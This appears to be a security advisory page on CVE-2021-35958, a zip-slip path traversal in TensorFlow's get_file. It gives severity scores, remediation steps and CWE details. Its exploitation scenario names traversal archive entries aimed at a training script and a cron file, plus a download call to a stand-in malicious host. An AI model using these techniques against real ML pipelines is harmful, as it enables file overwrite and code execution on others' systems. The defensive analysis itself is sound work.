CVE-2021-35958: TensorFlow: path traversal in get_file allows file overwrite

CRITICAL PoC AVAILABLE

Published June 30, 2021

CISO Take

Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.

What is the risk?

Critical (CVSS 9.1). No authentication or user interaction required — attackers need only serve a malicious archive at a URL fetched by the ML pipeline. The file overwrite primitive elevates readily to code execution by targeting Python scripts, config files, or model artifacts. ML training pipelines routinely download external datasets and pre-trained models at scale, making the attack surface broader than in typical application CVEs. Vendor's position that the function 'isn't meant for untrusted archives' does not reduce operational risk where pipelines consume third-party datasets.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
TensorFlow	pip	—	No patch
195.8K OpenSSF 7.1 3.7K dependents Pushed 3d ago 4% patched ~1372d to patch Full package profile →

Do you use TensorFlow? You're affected.

How severe is it?

CVSS 3.1

9.1 / 10

EPSS

1.9%

chance of exploitation in 30 days

Higher than 77% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Unchanged

C None

I High

A High

What should I do?

6 steps

Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.
Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs — flag all instances for review.
Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names.
Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.
Implement file integrity monitoring on model artifacts and training data directories.
For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.

How is it classified?

Supply Chain Code Execution Framework Training Data AML.T0010.001 - AI Software AML.T0010.002 - Data AML.T0011.001 - Malicious Package AML.T0049 - Exploit Public-Facing Application

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2 - AI system use by external parties and third-party AI tools

NIST AI RMF

MS-2.5 - AI Software and Third-Party Component Risk Management

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2021-35958?

Is CVE-2021-35958 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2021-35958, increasing the risk of exploitation.

How to fix CVE-2021-35958?

1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes. 2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs — flag all instances for review. 3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names. 4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories. 5. Implement file integrity monitoring on model artifacts and training data directories. 6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.

What systems are affected by CVE-2021-35958?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments.

What is the CVSS score for CVE-2021-35958?

CVE-2021-35958 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.86%.

What is the AI security impact?

Affected AI Architectures

training pipelinesdata preprocessing pipelinesmodel loading and servingCI/CD ML pipelinesnotebook environments

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0010.002 Data

AML.T0011.001 Malicious Package

AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Art. 15

ISO 42001: A.6.2

NIST AI RMF: MS-2.5

OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives

Exploitation Scenario

An adversary registers a lookalike domain mimicking a popular ML dataset repository or compromises a legitimate one. They publish a malicious .tar.gz archive containing a crafted entry with a traversal path such as ../../app/train.py or ../../etc/cron.d/mlbackdoor. When the ML training pipeline executes tf.keras.utils.get_file('https://malicious-host/dataset.tar.gz', extract=True), TensorFlow extracts without validating member paths. The attacker's payload overwrites a training script or scheduled task, which executes during the next model run or system event — achieving persistent code execution on ML infrastructure with the pipeline's credentials and network access.

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

[Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
[Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.